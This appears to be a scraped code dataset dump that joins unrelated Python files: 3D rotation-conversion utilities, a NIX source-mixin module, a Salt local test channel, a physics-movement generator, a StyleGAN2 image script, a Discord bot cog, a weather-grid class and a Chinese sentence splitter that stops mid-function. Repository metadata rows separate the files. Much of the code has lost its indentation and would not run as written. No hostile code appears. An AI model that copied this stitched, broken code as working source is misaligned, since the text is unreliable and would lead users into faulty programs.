from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if quaternions.shape[-1] != 4:
        raise ValueError(f'Invalid input quaternions {quaternions.shape}.')
t = Compose([quaternion_to_matrix, matrix_to_euler_angles])
return t(quaternions, convention)
def quat_to_rot6d(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to rotation 6d representations.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 4). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if quaternions.shape[-1] != 4:
        raise ValueError(f'Invalid input quaternions {quaternions.shape}.')
t = Compose([quaternion_to_matrix, matrix_to_rotation_6d])
return t(quaternions)
def rot6d_to_aa(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to axis angles.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
        raise ValueError(f'Invalid input rotation_6d {rotation_6d.shape}.')
t = Compose([
rotation_6d_to_matrix, matrix_to_quaternion, quaternion_to_axis_angle
])
return t(rotation_6d)
def rot6d_to_ee(rotation_6d: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to euler angles.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
        raise ValueError(f'Invalid input rotation_6d {rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix, matrix_to_euler_angles])
return t(rotation_6d, convention)
def rot6d_to_quat(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to quaternions.
Args:
        rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
raise ValueError(
            f'Invalid input rotation_6d shape {rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix, matrix_to_quaternion])
return t(rotation_6d)
def aa_to_sja(
axis_angle: Union[torch.Tensor, numpy.ndarray],
R_t: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_AA_TO_SJA,
R_t_inv: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_SJA_TO_AA
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis-angles to standard joint angles.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3), ndim of input is unlimited.
R_t (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
original axis-angle coordinate system to
standard joint angle coordinate system,
ndim of input is unlimited.
R_t_inv (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
standard joint angle coordinate system to
original axis-angle coordinate system,
ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
def _aa_to_sja(aa, R_t, R_t_inv):
R_aa = axis_angle_to_matrix(aa)
R_sja = R_t @ R_aa @ R_t_inv
sja = matrix_to_euler_angles(R_sja, convention='XYZ')
return sja
    if axis_angle.shape[-2:] != (21, 3):
        raise ValueError(
            f'Invalid input axis angles shape {axis_angle.shape}.')
    if R_t.shape[-3:] != (21, 3, 3):
        raise ValueError(f'Invalid input R_t shape {R_t.shape}.')
    if R_t_inv.shape[-3:] != (21, 3, 3):
        raise ValueError(f'Invalid input R_t_inv shape {R_t_inv.shape}.')
t = Compose([_aa_to_sja])
return t(axis_angle, R_t=R_t, R_t_inv=R_t_inv)
def sja_to_aa(
sja: Union[torch.Tensor, numpy.ndarray],
R_t: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_AA_TO_SJA,
R_t_inv: Union[torch.Tensor, numpy.ndarray] = TRANSFORMATION_SJA_TO_AA
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert standard joint angles to axis angles.
Args:
sja (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3). ndim of input is unlimited.
R_t (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
original axis-angle coordinate system to
standard joint angle coordinate system
R_t_inv (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 21, 3, 3). Transformation matrices from
standard joint angle coordinate system to
original axis-angle coordinate system
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
def _sja_to_aa(sja, R_t, R_t_inv):
R_sja = euler_angles_to_matrix(sja, convention='XYZ')
R_aa = R_t_inv @ R_sja @ R_t
aa = quaternion_to_axis_angle(matrix_to_quaternion(R_aa))
return aa
    if sja.shape[-2:] != (21, 3):
        raise ValueError(f'Invalid input standard joint angles shape {sja.shape}.')
    if R_t.shape[-3:] != (21, 3, 3):
        raise ValueError(f'Invalid input R_t shape {R_t.shape}.')
    if R_t_inv.shape[-3:] != (21, 3, 3):
        raise ValueError(f'Invalid input R_t_inv shape {R_t_inv.shape}.')
t = Compose([_sja_to_aa])
return t(sja, R_t=R_t, R_t_inv=R_t_inv)
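# Illustrative usage sketch (not part of the original module):
#     body_pose = torch.zeros(1, 21, 3)   # a batch of 21 axis-angle joint rotations
#     sja = aa_to_sja(body_pose)          # standard joint angles, shape (1, 21, 3)
#     aa_back = sja_to_aa(sja)            # back to axis-angle, same shape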
| 37.591985
| 79
| 0.637901
|
183738330f17bd6c8c8139a885b108b77ccd94c8
| 1,394
|
py
|
Python
|
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
nix/entity_with_sources.py
|
gicmo/nixpy
|
015bef00af764f3f773fb0e8fe5afa660669adf8
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2014, German Neuroinformatics Node (G-Node)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted under the terms of the BSD License. See
# LICENSE file in the root of the Project.
from __future__ import (absolute_import, division, print_function, unicode_literals)
from nix.core import DataArray, MultiTag, Tag
from nix.util.inject import inject
from nix.util.proxy_list import RefProxyList
class RefSourceProxyList(RefProxyList):
def __init__(self, obj):
super(RefSourceProxyList, self).__init__(obj, "_source_count", "_get_source_by_id",
"_get_source_by_pos", "_remove_source_by_id", "_add_source_by_id")
_sources_doc = """
Getter for sources.
"""
def _get_sources(self):
if not hasattr(self, "_sources"):
setattr(self, "_sources", RefSourceProxyList(self))
return self._sources
class DataArraySourcesMixin(DataArray):
sources = property(_get_sources, None, None, _sources_doc)
class MultiTagSourcesMixin(MultiTag):
sources = property(_get_sources, None, None, _sources_doc)
class TagSourcesMixin(Tag):
sources = property(_get_sources, None, None, _sources_doc)
inject((DataArray,), dict(DataArraySourcesMixin.__dict__))
inject((MultiTag,), dict(MultiTagSourcesMixin.__dict__))
inject((Tag,), dict(TagSourcesMixin.__dict__))
| 27.88
| 91
| 0.753228
|
25e521cde364d7969a1029d5f4d17960bfcaa467
| 1,726
|
py
|
Python
|
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-03-31T22:51:16.000Z
|
2020-03-31T22:51:16.000Z
|
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
salt/transport/local.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-09-30T07:00:01.000Z
|
2021-09-30T07:00:01.000Z
|
# -*- coding: utf-8 -*-
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
# Import Salt Libs
import salt.utils.files
from salt.transport.client import ReqChannel
log = logging.getLogger(__name__)
class LocalChannel(ReqChannel):
'''
Local channel for testing purposes
'''
def __init__(self, opts, **kwargs):
self.opts = opts
self.kwargs = kwargs
self.tries = 0
def close(self):
'''
Close the local channel.
Currently a NOOP
'''
def send(self, load, tries=3, timeout=60, raw=False):
if self.tries == 0:
log.debug('LocalChannel load: %s', load)
#data = json.loads(load)
#{'path': 'apt-cacher-ng/map.jinja', 'saltenv': 'base', 'cmd': '_serve_file', 'loc': 0}
#f = open(data['path'])
with salt.utils.files.fopen(load['path']) as f:
ret = {
'data': ''.join(f.readlines()),
'dest': load['path'],
}
print('returning', ret)
else:
# end of buffer
ret = {
'data': None,
'dest': None,
}
self.tries = self.tries + 1
return ret
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
super(LocalChannel, self).crypted_transfer_decode_dictentry(load,
dictkey=dictkey,
tries=tries,
timeout=timeout)
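# Illustrative usage sketch (not part of the Salt source): the channel serves a local
# file on the first send() and signals end-of-buffer afterwards (opts/path are hypothetical):
#     channel = LocalChannel(opts={})
#     channel.send({'path': '/tmp/example.sls'})   # -> {'data': <file contents>, 'dest': '/tmp/example.sls'}
#     channel.send({'path': '/tmp/example.sls'})   # -> {'data': None, 'dest': None}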
| 30.280702
| 99
| 0.488413
|
9056bf20ad5e88455a4a8cac66a57a3aaad8dc3a
| 10,107
|
py
|
Python
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 4
|
2021-02-04T03:57:52.000Z
|
2022-02-08T18:19:58.000Z
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 68
|
2021-05-06T08:52:46.000Z
|
2022-03-23T16:46:03.000Z
|
hypercube/generate_movement.py
|
NextCenturyCorporation/mcs-scene-generator
|
e0a6ee778359cadd2de682a5006581b7a6134431
|
[
"Apache-2.0"
] | 1
|
2021-02-04T03:21:57.000Z
|
2021-02-04T03:21:57.000Z
|
import json
from generator.occluders import OCCLUDER_BUFFER
from .intuitive_physics_hypercubes import (
MAX_TARGET_Z,
MIN_TARGET_Z,
MOVEMENT_JSON_FILENAME,
STEP_Z,
object_x_to_occluder_x,
retrieve_off_screen_position_x,
validate_in_view,
)
from .movements import (
DEEP_EXIT_LIST,
DEEP_STOP_LIST,
MOVE_EXIT_LIST,
MOVE_STOP_LIST,
TOSS_EXIT_LIST,
TOSS_STOP_LIST,
)
"""
This script creates the movements.json data file with all the movements used
by the passive intuitive physics scenes. Rerun this script whenever you update
movements.py and commit movements.json to the git repository.
"""
# Somewhat arbitrary
SLOWDOWN = 0.02
EXIT_LIST = [
('deepExit', DEEP_EXIT_LIST, False, False),
('tossExit', TOSS_EXIT_LIST, False, False)
]
STOP_LIST = [
('moveStop', MOVE_STOP_LIST, True, False),
('deepStop', DEEP_STOP_LIST, True, False),
('tossStop', TOSS_STOP_LIST, True, True)
]
EXIT_STOP_LIST = EXIT_LIST + STOP_LIST
def mark_stop_step():
"""Mark the step on which the object will (almost completely) stop moving
in each stop-on-screen movement."""
for movement_list in [MOVE_STOP_LIST, DEEP_STOP_LIST, TOSS_STOP_LIST]:
for movement in movement_list:
for index, value in enumerate(movement['xDistanceByStep']):
if index > 0:
prior = movement['xDistanceByStep'][index - 1]
if value < (prior + SLOWDOWN):
movement['stopStep'] = index
break
if 'stopStep' not in movement:
movement['stopStep'] = len(movement['xDistanceByStep']) - 1
def mark_land_step():
"""Mark the step on which the object will land on the ground in each
toss-and-stop-on-screen movement."""
for movement_list in [TOSS_STOP_LIST]:
for movement in movement_list:
y_list = [y for y in movement['yDistanceByStep'] if y >= SLOWDOWN]
movement['landStep'] = len(y_list) - 1
def identify_matching_movement(starting_data_list, movement_data_list):
"""Return the full list of matching X/Z positions, steps, and movements."""
if len(movement_data_list) == 0:
return starting_data_list
name, other_move_list, does_stop, does_land = movement_data_list[0]
matching_data_list = []
# Iterate over each item in the data list...
for position_z, step, position_x, move_index_list in starting_data_list:
# Iterate over each move in the move list...
for index, other_move in enumerate(other_move_list):
# Find each comparison step in the other move.
other_step_list = (
([(step, (not does_stop))]) +
([(other_move['stopStep'], True)] if does_stop else []) +
([(other_move['landStep'], False)] if does_land else [])
)
successful = True
for other_step, validate_position in other_step_list:
if len(other_move['xDistanceByStep']) <= other_step:
successful = False
break
# Identify the starting position.
other_z = other_move.get('startZ', position_z)
other_x = other_move.get('startX', (
-1 * retrieve_off_screen_position_x(other_z)
))
# Find the step's comparison X position in the other move.
other_position_x = object_x_to_occluder_x(
(other_x + other_move['xDistanceByStep'][other_step]),
(other_z + other_move['zDistanceByStep'][other_step])
if 'zDistanceByStep' in other_move else other_z
)
if (
other_position_x is None or
not validate_in_view(other_position_x)
):
successful = False
break
# Verify that each X is almost the same, if needed.
if validate_position and (
other_position_x >= (position_x + OCCLUDER_BUFFER) or
other_position_x <= (position_x - OCCLUDER_BUFFER)
):
successful = False
break
# If all the X positions are approximately the same, then it's a
# match! Add the data with this move's index to the output.
if successful:
matching_data_list.append((
position_z, step, position_x, move_index_list + [index]
))
print(f'DONE {name} WITH {len(matching_data_list)}')
# Call recursively on the next move.
return identify_matching_movement(
matching_data_list,
movement_data_list[1:]
)
def save_matching_movement(
movement,
matching_data_list,
option_list_property,
movement_data_list
):
"""Add each data item in the given list to the option list with the given
property."""
for matching_data in matching_data_list:
position_z, step, _, move_index_list = matching_data
if step not in movement[option_list_property][position_z]:
movement[option_list_property][position_z][step] = []
# Save each movement's name with its matching index.
option = {}
for index, movement_index in enumerate(move_index_list):
option[movement_data_list[index][0]] = movement_index
# If this option will have both deep movements, ensure that they will
# both use the same X/Z starting position (if not, skip it!).
if 'deepExit' in option and 'deepStop' in option:
deep_exit = DEEP_EXIT_LIST[option['deepExit']]
deep_stop = DEEP_STOP_LIST[option['deepStop']]
if (
deep_exit['startX'] != deep_stop['startX'] or
deep_exit['startZ'] != deep_stop['startZ']
):
# Delete the empty array first to avoid an issue later.
if len(movement[option_list_property][position_z][step]) == 0:
del movement[option_list_property][position_z][step]
continue
# Add it as an option in this list.
movement[option_list_property][position_z][step].append(option)
def make_each_full_option_list():
"""Make each option list in each move-and-exit-the-screen movement."""
iterator_z_max = (MAX_TARGET_Z - MIN_TARGET_Z) / STEP_Z
for movement in MOVE_EXIT_LIST:
movement['exitOnlyOptionList'] = {}
movement['exitStopOptionList'] = {}
exit_only_starting_data_list = []
exit_stop_starting_data_list = []
# Iterate over each possible Z position...
for iterator_z in range(int(iterator_z_max) + 1):
position_z = round(MIN_TARGET_Z + (STEP_Z * iterator_z), 2)
starting_x = -1 * retrieve_off_screen_position_x(position_z)
# Add each possible Z position as a key in each option list.
movement['exitOnlyOptionList'][position_z] = {}
movement['exitStopOptionList'][position_z] = {}
# Iterate over each step in the current movement...
for step in range(len(movement['xDistanceByStep'])):
position_x = object_x_to_occluder_x(
(starting_x + movement['xDistanceByStep'][step]),
(position_z + movement['zDistanceByStep'][step])
if 'zDistanceByStep' in movement else position_z
)
if (
# Skip step 0 because it will never be within view.
position_x is None or step == 0 or
# Ensure an occluder at this X position is within view.
not validate_in_view(position_x)
):
continue
# Add the X/Z position with its step to each data list.
exit_only_starting_data_list.append(
(position_z, step, position_x, [])
)
exit_stop_starting_data_list.append(
(position_z, step, position_x, [])
)
print(f'MAKING exitOnlyOptionList ON moveExit {movement["forceX"]}')
exit_only_matching_data_list = identify_matching_movement(
exit_only_starting_data_list,
EXIT_LIST
)
print(f'SAVING exitOnlyOptionList ON moveExit {movement["forceX"]}')
save_matching_movement(
movement,
exit_only_matching_data_list,
'exitOnlyOptionList',
EXIT_LIST
)
print(f'MAKING exitStopOptionList ON moveExit {movement["forceX"]}')
exit_stop_matching_data_list = identify_matching_movement(
exit_stop_starting_data_list,
EXIT_STOP_LIST
)
print(f'SAVING exitStopOptionList ON moveExit {movement["forceX"]}')
save_matching_movement(
movement,
exit_stop_matching_data_list,
'exitStopOptionList',
EXIT_STOP_LIST
)
for iterator_z in range(int(iterator_z_max) + 1):
position_z = round(MIN_TARGET_Z + (STEP_Z * iterator_z), 2)
if len(movement['exitStopOptionList'][position_z].keys()) == 0:
print(f'FAILURE: {position_z} !!!!!')
else:
print(f'SUCCESS: {position_z}')
def save_movement_to_json_file():
with open(MOVEMENT_JSON_FILENAME, 'w') as movement_file:
json.dump({
'moveExit': MOVE_EXIT_LIST,
'deepExit': DEEP_EXIT_LIST,
'tossExit': TOSS_EXIT_LIST,
'moveStop': MOVE_STOP_LIST,
'deepStop': DEEP_STOP_LIST,
'tossStop': TOSS_STOP_LIST,
}, movement_file)
def main():
print('GENERATING PASSIVE INTUITIVE PHYSICS MOVEMENT (PLEASE WAIT)...')
mark_stop_step()
mark_land_step()
make_each_full_option_list()
save_movement_to_json_file()
print('FINISHED GENERATING MOVEMENT')
if __name__ == '__main__':
main()
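# Illustrative sketch (not part of the original script): consumers can reload the
# generated data with the standard json module, e.g.
#     with open(MOVEMENT_JSON_FILENAME) as movement_file:
#         movement_data = json.load(movement_file)
#     move_exit_list = movement_data['moveExit']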
| 39.326848
| 79
| 0.605125
|
51da0d12e5b0ee288bfeed2d2f7e52a6f05ec06b
| 2,372
|
py
|
Python
|
modules/miscellaneous.py
|
DMCTruong/MoosikBot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | 1
|
2017-08-07T02:36:39.000Z
|
2017-08-07T02:36:39.000Z
|
modules/miscellaneous.py
|
DMCTruong/Discord-Bot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | null | null | null |
modules/miscellaneous.py
|
DMCTruong/Discord-Bot
|
d00e231ab4d3beed8e1b454bff0400bee3d8c823
|
[
"MIT"
] | null | null | null |
##########################################################################################
# Program Name : Discord Bot
# Author : DMCTruong
# Last Updated : August 31, 2017
# License : MIT
# Description : A general purpose bot written for Discord
##########################################################################################
import discord
from discord.ext import commands
import asyncio
import configurations
import random
from random import randint
import time
bot = commands.Bot(configurations.PREFIX)
eightBallResponses = [
"Sure, go for it!",
"Sure but I'm not entirely certain",
"Perhaps?",
"No, that's a terrible idea!",
]
class Miscellaneous:
def __init__(self, bot):
self.bot = bot
@bot.command(pass_context=True, aliases=["8ball"])
async def ask(self, ctx):
"""Ask the bot a yes/no/maybe question."""
random.seed(time.time())
askResponse = eightBallResponses[random.randrange(len(eightBallResponses))]
print(ctx.message.author.mention + " " + askResponse)
await self.bot.say(ctx.message.author.mention + " " + askResponse)
@bot.command(pass_context=True)
async def hug(self, ctx, *, member: discord.Member=None):
"""Give someone or yourself a hug!"""
generate_hug = randint(1, 16)
gif_url = "https://dmctruong.000webhostapp.com/.Discord/gifs-hugs/hug" + str(generate_hug) + ".gif"
if member is None:
print("*hugs* " + gif_url)
await self.bot.say("*hugs*\n" + gif_url)
else:
if member.id == ctx.message.author.id:
print("*hugs* " + gif_url)
await self.bot.say("*hugs*\n" + gif_url)
else:
print(ctx.message.author.mention + " gave " + member.mention + " a hug! " + gif_url)
await self.bot.say(ctx.message.author.mention + " gave " + member.mention + " a hug!\n" + gif_url)
@bot.command(pass_context=True)
async def pick(self, ctx, *, choices: str):
"""Pick between given choices"""
choicesArr = choices.split(" or ")
chosen = choicesArr[random.randrange(len(choicesArr))]
print(ctx.message.author.mention + ": I choose " + chosen)
await self.bot.say(ctx.message.author.mention + ": I choose " + chosen)
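# Illustrative setup sketch (not part of the original module), following the
# discord.py extension convention this cog appears to assume:
#     def setup(bot):
#         bot.add_cog(Miscellaneous(bot))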
| 37.650794
| 114
| 0.563238
|
c982d802edaa443c07a8c6c9d750627fd0a36f3f
| 5,502
|
py
|
Python
|
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
generate.py
|
NILOIDE/stylegan2-ada-pytorch
|
7a3f2f4e1e7aa38a78e34c0f6a16297e8704cef7
|
[
"BSD-Source-Code"
] | null | null | null |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Generate images using pretrained network pickle."""
import os
import re
from typing import List, Optional
import click
import dnnlib
import numpy as np
import PIL.Image
import torch
from pathlib import Path
import legacy
#----------------------------------------------------------------------------
def num_range(s: str) -> List[int]:
'''Accept either a comma separated list of numbers 'a,b,c' or a range 'a-c' and return as a list of ints.'''
range_re = re.compile(r'^(\d+)-(\d+)$')
m = range_re.match(s)
if m:
return list(range(int(m.group(1)), int(m.group(2))+1))
vals = s.split(',')
return [int(x) for x in vals]
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--network', 'network_pkl', help='Network pickle filename', required=True)
@click.option('--seeds', type=num_range, help='List of random seeds')
@click.option('--trunc', 'truncation_psi', type=float, help='Truncation psi', default=1, show_default=True)
@click.option('--class', 'class_idx', type=int, help='Class label (unconditional if not specified)')
@click.option('--noise-mode', help='Noise mode', type=click.Choice(['const', 'random', 'none']), default='const', show_default=True)
@click.option('--projected-w', help='Projection result file', type=str, metavar='FILE')
@click.option('--outdir', help='Where to save the output images', type=str, required=True, metavar='DIR')
def generate_images(
ctx: click.Context,
network_pkl: str,
seeds: Optional[List[int]],
truncation_psi: float,
noise_mode: str,
outdir: str,
class_idx: Optional[int],
projected_w: Optional[str]
):
"""Generate images using pretrained network pickle.
Examples:
\b
# Generate curated MetFaces images without truncation (Fig.10 left)
python generate.py --outdir=out --trunc=1 --seeds=85,265,297,849 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate uncurated MetFaces images with truncation (Fig.12 upper left)
python generate.py --outdir=out --trunc=0.7 --seeds=600-605 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
\b
# Generate class conditional CIFAR-10 images (Fig.17 left, Car)
python generate.py --outdir=out --seeds=0-35 --class=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/cifar10.pkl
\b
# Render an image from projected W
python generate.py --outdir=out --projected_w=projected_w.npz \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/metfaces.pkl
"""
print('Loading networks from "%s"...' % network_pkl)
device = torch.device('cuda')
with dnnlib.util.open_url(network_pkl) as f:
G = legacy.load_network_pkl(f)['G_ema'].to(device) # type: ignore
sub_dir = str(Path(network_pkl).parts[-1])[:-4]
outdir = str(Path(outdir) / f"generated_{sub_dir}")
print("Saving to:", outdir)
os.makedirs(outdir, exist_ok=True)
# Synthesize the result of a W projection.
if projected_w is not None:
if seeds is not None:
print ('warn: --seeds is ignored when using --projected-w')
print(f'Generating images from projected W "{projected_w}"')
ws = np.load(projected_w)['w']
ws = torch.tensor(ws, device=device) # pylint: disable=not-callable
assert ws.shape[1:] == (G.num_ws, G.w_dim)
for idx, w in enumerate(ws):
img = G.synthesis(w.unsqueeze(0), noise_mode=noise_mode)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
            PIL.Image.fromarray(img[0].cpu().numpy(), 'RGB').save(f'{outdir}/proj{idx:02d}.png')
return
if seeds is None:
ctx.fail('--seeds option is required when not using --projected-w')
# Labels.
label = torch.zeros([1, G.c_dim], device=device)
if G.c_dim != 0:
if class_idx is None:
ctx.fail('Must specify class label with --class when using a conditional network')
label[:, class_idx] = 1
else:
if class_idx is not None:
print ('warn: --class=lbl ignored when running on an unconditional network')
# Generate images.
for seed_idx, seed in enumerate(seeds):
print('Generating image for seed %d (%d/%d) ...' % (seed, seed_idx, len(seeds)))
z = torch.from_numpy(np.random.RandomState(seed).randn(1, G.z_dim)).to(device)
img = G(z, label, truncation_psi=truncation_psi, noise_mode=noise_mode)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
PIL.Image.fromarray(img[0].cpu().numpy(), 'RGB').save(f'{outdir}/seed{seed:04d}.jpg')
#----------------------------------------------------------------------------
if __name__ == "__main__":
generate_images() # pylint: disable=no-value-for-parameter
#----------------------------------------------------------------------------
| 41.368421
| 132
| 0.631952
|
d1571512bdaae08e093a5df7b641d32f6f852bfe
| 1,398
|
py
|
Python
|
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | null | null | null |
edexOsgi/com.raytheon.uf.common.dataplugin.gfe/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/gfe/slice/WeatherGridSlice.py
|
srcarter3/awips2
|
37f31f5e88516b9fd576eaa49d43bfb762e1d174
|
[
"Apache-2.0"
] | 1
|
2021-10-30T00:03:05.000Z
|
2021-10-30T00:03:05.000Z
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
# File auto-generated against equivalent DynamicSerialize Java class
from dynamicserialize.dstypes.com.raytheon.uf.common.dataplugin.gfe.slice import AbstractGridSlice
class WeatherGridSlice(AbstractGridSlice):
def __init__(self):
super(WeatherGridSlice, self).__init__()
self.weatherGrid = None
self.keys = []
def getNumPyGrid(self):
pass
def getWeatherGrid(self):
return self.weatherGrid
def setWeatherGrid(self, weatherGrid):
self.weatherGrid = weatherGrid
def getKeys(self):
return self.keys
def setKeys(self, keys):
self.keys = keys
| 29.744681
| 98
| 0.680258
|
6883b815aa54ee7552dd33912fb6b490f1ddc978
| 1,447
|
py
|
Python
|
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | 1
|
2021-02-24T02:41:31.000Z
|
2021-02-24T02:41:31.000Z
|
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/Xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | null | null | null |
Plugins/Extensions/GetChinese/SplitSentence.py
|
yingshaoxo/Xiaoya
|
559ff798dfc1016e3d04a69d86d035b1dec70b57
|
[
"MIT"
] | null | null | null |
import re
def handle_break(obj):
text = obj.group(0)
if re.match(r'^\s+$', text)==None:
return re.sub(r'\s*', '', text)
else:
return text
def fix_break(text):
text = re.sub(r'[^。!?…;:”"》】]\s+', handle_break, text)
return text
def list_to_text(_list, num_of_line):
text = ''
for num, i in enumerate(_list, start=1):
if num % num_of_line != 0:
text += i + '\n'
else:
text += i + '\n\n'
return text
def handle(obj):
text = obj.group(0)
text = text.strip(' \n ')
return text + '\n'*2
def handle_no_space(obj):
text = obj.group(0)
return re.sub(r'\s*', '', text)
def split_sentence(text):
text = fix_break(text)
text = re.sub(r'((.*?)(?<!B|A)([!?。]))', handle, text)
text = re.sub(r'“(\\.|[^“”])*”', handle_no_space, text)
text = re.sub(r':(\\.|[^:“])*“', handle_no_space, text)
a_list = text.split('\n')
